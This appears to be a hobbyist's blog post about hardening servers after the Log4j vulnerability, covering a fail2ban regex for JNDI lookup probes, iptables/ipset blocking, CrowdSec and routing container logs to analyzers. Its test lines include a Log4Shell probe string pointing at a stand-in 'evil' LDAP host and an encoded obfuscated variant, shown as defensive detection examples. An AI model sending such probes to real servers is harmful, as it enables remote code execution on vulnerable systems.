More Log4j Work
Hot on the heels of the v2.15.0 fix came a v2.16.0 fix, which removed the core of the vulnerability by disabling message lookups entirely, taking away a feature that was rarely, if ever, used correctly.
I zipped through my JDK apps and performed another Continuous Modernization sweep, and I should be just fine on this front. I also came up with a list of things to modernize completely, including dropping some apps that require application servers and Servlet containers, or at least refactoring them onto stand-alone technologies so they can be properly containerized.
All of that led me to the realization that I've got a gap in my tech stack, and I'm not entirely sure how to fix it just yet.
As I dug through my log aggregation, I saw that this vulnerability is indeed being actively probed against my servers. I use Cloudflare as a CDN and IP abstraction, and they're blocking many attempts, but some get through. Some requests may be slipping past their WAF, or people may be addressing the servers directly. Regardless, hundreds (not huge, but not zero, either) of attempts have been logged by my web servers. Note that none of these are reaching the JVM loggers or showing up in their output, so none of them are successful attempts.
I poked around and found an example of a fail2ban filter, which I enhanced with a somewhat more aggressive regex to catch the ${lower:j}ndi kinds of obfuscation I saw in my logs. It might be a bit too aggressive and could block some false positives, but nothing on my servers legitimately uses those strings, except perhaps someone searching for "jndi:ldap" on the pages, for which a couple of these blog posts would be valid results. Within a few minutes of putting the filter in place, it caught and blocked an IP because of a search term in a URL. Then I realized that the other server isn't involved in this at all.
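The idea is a pattern along these lines (a sketch of my own, not the exact regex in the filter): flag "jndi" itself, or any ${...} lookup syntax, including the URL-encoded %24%7B form that the ${lower:j}ndi tricks reduce to.

```shell
# Hypothetical recreation of the kind of pattern such a filter uses.
# It matches "jndi" (case-insensitive) or the start of any ${...}
# lookup, plain or URL-encoded, which catches nested obfuscations
# like ${lower:j}ndi without trying to enumerate them.
pattern='jndi|(\$|%24)(\{|%7B)'

printf 'GET /?q=${jndi:ldap://evil/a}\n'    | grep -Eiq "$pattern" && echo blocked
printf 'GET /?x=%%24%%7Blower:j%%7Dndi\n'   | grep -Eiq "$pattern" && echo blocked
# ...and the false-positive case: a plain search for the string.
printf 'GET /?s=jndi:ldap\n'                | grep -Eiq "$pattern" && echo blocked
```

In a real fail2ban filter this core would sit inside a `failregex` line anchored with `<HOST>`, and `fail2ban-regex` can be run against an access log to check it before enabling the jail.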
On the "service runs on the OS" server, the logs are still written to directories and read from there by the analyzers, one of which is fail2ban, which in turn informs the firewall via ipset. On the "services run in containers" server, the logs are sent via a forwarder to one of the log analyzers, but the others never see them. It's been a small annoyance: Splunk works and collects everything, but Awstats is incomplete, and fail2ban and the others get nothing at all. This means that for this and other threats, bad actors can continue to pester my container servers even after my legacy service server has identified their threat (or annoyance).
I realized that on my container servers, the intrusion detection should either live in (or in front of) the ingress, or cooperate with the OS so it can drive the OS firewall. I mean, that firewall is dead simple: "drop anything except http(s), and forward those to the ingress private IP." Getting something to block IPs because of bad attempts should be pretty straightforward.
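For illustration, that dead-simple firewall plus an IDS-maintained block list might look something like this in iptables/ipset terms (a config sketch only; the interface name and the 10.0.0.10 ingress address are made up):

```shell
# Forward http(s) to the ingress, drop everything else.
iptables -t nat -A PREROUTING -i eth0 -p tcp -m multiport --dports 80,443 \
  -j DNAT --to-destination 10.0.0.10
iptables -A FORWARD -d 10.0.0.10 -p tcp -m multiport --dports 80,443 -j ACCEPT
iptables -P FORWARD DROP

# Blocking bad actors is then just an ipset the IDS can add to:
ipset create banned hash:ip
iptables -I FORWARD -m set --match-set banned src -j DROP
ipset add banned 203.0.113.7
```

This is exactly the shape fail2ban already produces on the legacy server, which is why it feels like it should carry over.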
I broke this down into two separate but tightly coupled problems. The first is getting that ingress watched, and the second is improving the intrusion detection.
Fail2ban, while a little primitive and brute-force, does work well. It can take some tweaking, but I've watched live as my logs emit records of bad attempts, fail2ban adds a block, and the attempts stop. It isn't distributed, though, so each server has to analyze its own logs and determine its own blocks. If there were a way to distribute the blocks, the fail2ban on the container server (which never blocks anything because it sees no logs) could at least leverage the other server's knowledge.
While investigating this, which seems to be a problem more people have had than solved, I came upon CrowdSec. I poked at it a little and watched some YouTube videos about it, and it seems to offer even more than I need. As its name implies, it's trying to be a crowd-sourced security tool, which allows many systems to contribute findings and share the details used to determine what to block. It seems to have a much richer toolkit than fail2ban, and it looks able to monitor the same kinds of log files and events I use to help secure my servers.
The CrowdSec model pairs a log-analyzing "agent" with a "bouncer" application that consumes the crowd-informed decisions and refuses bad traffic. This seems well suited to my simple blocking needs, whether configured in front of the web app or interacting with the OS firewall. Either approach would work, and either would let the unprotected server leverage the other server's (and other people's servers') log-analysis contributions.
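From what I've read so far, wiring the pieces up looks roughly like this (package and collection names as given in the CrowdSec docs; exact commands vary by distro, so treat this as a sketch, not a recipe):

```shell
# The log-parsing "agent":
sudo apt install crowdsec

# Parsers and detection scenarios for web-server logs:
sudo cscli collections install crowdsecurity/nginx

# The "bouncer" that turns decisions into firewall rules:
sudo apt install crowdsec-firewall-bouncer-iptables

# Inspect what is currently being blocked:
sudo cscli decisions list
```

The appealing part is that the bouncer on the container server doesn't need local logs at all; it just enforces decisions, wherever they were made.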
This doesn't solve the second problem: analyzing the log files from the containers. The most straightforward solution seems to be switching from forwarding the container logs to a single analysis tool, to logging on the host, probably to files, and sharing those files with the various analyzers. Or perhaps having the containers forward their logs to a remote syslog server that writes them to files the analyzers can read.
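One way to try the syslog route, assuming Docker (the hostname and the rsyslog snippet here are illustrative, not my actual config):

```shell
# Send a container's logs to a syslog server instead of the default
# json-file driver, tagging lines with the container name:
docker run -d \
  --log-driver=syslog \
  --log-opt syslog-address=udp://loghost.example.internal:514 \
  --log-opt tag="{{.Name}}" \
  nginx

# On loghost, rsyslog can split those lines into per-container files
# that Awstats, fail2ban, CrowdSec, and Splunk can all read, e.g.:
#   template(name="perContainer" type="string"
#            string="/var/log/containers/%syslogtag%.log")
#   action(type="omfile" dynaFile="perContainer")
```

That would put the container logs back into the "files on disk" shape the rest of the analyzer stack already expects.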
So I'll be spending a little hobby time seeing if I can get CrowdSec working with my firewalls, and eventually my containers, and whether I can better rig my container logs, especially for this kind of intrusion detection. Having them in a "time and size" kind of analyzer like Splunk is great for many things, but limiting them to that one analyzer breaks some of the other things logs can help with.
It might be time to break out some ELK, replace that old Awstats, rethink IPS, and more!